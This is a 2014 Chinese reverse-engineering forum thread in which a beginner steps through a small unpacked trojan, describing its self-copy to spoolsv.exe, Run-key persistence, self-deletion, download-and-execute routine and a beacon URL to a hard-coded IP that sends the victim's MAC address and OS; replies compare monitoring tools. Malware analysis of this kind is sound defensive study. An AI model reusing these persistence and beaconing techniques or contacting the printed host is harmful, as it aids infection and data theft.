吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6149|回复: 11
收起左侧

[PC样本分析] [成长快乐]将错就错,菜鸟学分析病毒之路

  [复制链接]
chishubiao 发表于 2014-9-22 21:12
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 chishubiao 于 2014-9-22 21:15 编辑

之前在浏览论坛的一个帖子,看到http://www.52pojie.cn/thread-247471-1-1.html
觉得只有20k,应该挺好玩的,于是下载了下来,但是一直没有分析,今天分析一马的时候需要dump一块区域下来,误把这个文件当作dump下来的文件分析,分析到差不多的时候才发现不对劲,于是索性将错就错把该马的分析过程记录下来。
整理好文档之后正准备发的时候才发现论坛里已经有人发出这个帖子了。。见http://www.52pojie.cn/thread-253648-1-1.html     汗。。
不过既然整理出来了还是发一下,本人还是一样从作为我这样一个菜鸟的角度来谈如何分析这个菜鸟们最最适合上手的木马。

1。先跑跑行为,有了行为做指引后面的分析就会变得极其容易。
1.jpg
可以看到它创建了文件,修改了注册表,有网络通信,有自删除的功能,心里默默记住就好

2。看看壳,vc++的,没壳,没附加数据,不用做处理了。

3。载入IDA或者OD,因为既然可以跑出行为,代码量又特别少,那直接就OD单部跟着走,边走边坐标记。

获取c:\windows\system\spoolsv.exe属性
若不存在,则copy当前文件至c:\windows\system\spoolsv.exe

copy

copy
500ms后执行当前文件,设置进程优先级为实时,删除自身,并退出

setprority

setprority
如果是目录,删除该名字的目录,copy当前文件至c:\windows\system\spoolsv.exe
,执行当前文件,设置进程优先级为实时,并删除自身,删除时都使用createRemoteProcess

del

del
通过设置注册表HKEY_LOCAL_MACHINE\Software\Microft\Windows\CurrentVersionRun使其能开机自启动.

run

run
使用URLDownLoadToFile下载文件到本地的fuck.ini,并使用WinExec执行

download

download
调用GetPrivateProfileStringA来获得fuck.ini中的配置:

read ini

read ini
查查关于读取ini的资料,不难写出
fuck.ini结构:
[x0]
jc=进程
mz=
ys=
url=
调用了createToolHelp32SnapShot,Process32First,Process32Next遍历所有进程,搜索jc
获取系统的版本,mac地址等信息,调用InternetOpenUrl按照如下地址和格式发送:
00404134
"http://121.12.115.10:1111/count.asp?mac=080027659CC0&ver=20120919&makedate=&userID=ceo&ComPut=USER-20140909BM&os=Windows XP&key=nb20548ccccccccccccccccccccccccc&explorer="

getver

getver
清理痕迹

del cache

del cache

注意单步的时候遇到不会的API现搜就行 ,注意参数传递,之所以说它好上手是因为无壳,无任何代码加密,流程简单,所涉及到API都是很常见的API,各位可以拿这个练练手。

免费评分

参与人数 1热心值 +1 收起 理由
闹够了没有 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

2314902431 发表于 2014-9-22 21:23
MD路过.有没有规则 =.=
 楼主| chishubiao 发表于 2014-9-22 21:25
2314902431 发表于 2014-9-22 21:23
MD路过.有没有规则 =.=

习惯md了。。。

点评

同感.一直在用.一般只开MD.别的统统关掉.也就运行高风险的未知软件我才会开防御软件.可惜没有比较完善的规则.只能开学习模式  发表于 2014-9-22 21:31
头像被屏蔽
973 发表于 2014-9-22 21:35
 楼主| chishubiao 发表于 2014-9-22 21:38

嗯 是啊  而且这玩意还有个缺点 使用底层一点的api完成的操作它完全监控不到
 楼主| chishubiao 发表于 2014-9-22 21:39

谢谢支持
Godfather.Cr 发表于 2014-10-1 23:59
chishubiao 发表于 2014-9-22 21:38
嗯 是啊  而且这玩意还有个缺点 使用底层一点的api完成的操作它完全监控不到

长姿势了
原来MD还有这个缺点
一直也喜欢单奔MD的,看来以后要小心了
 楼主| chishubiao 发表于 2014-10-2 15:57
Godfather.Cr 发表于 2014-10-1 23:59
长姿势了
原来MD还有这个缺点
一直也喜欢单奔MD的,看来以后要小心了

恩 跟他相反的比较极端的是火绒剑 那个就是特别详细
Godfather.Cr 发表于 2014-10-2 22:03
火绒剑很久之前虚拟机弄过一次,都忘记什么样子了
有时间再下载个虚拟机试试
Mr.Mlwareson_V 发表于 2014-10-6 00:56
chishubiao 发表于 2014-10-2 15:57
恩 跟他相反的比较极端的是火绒剑 那个就是特别详细

学习学习,火绒剑对钩子和内核审查比较清楚,
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-1 04:00

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表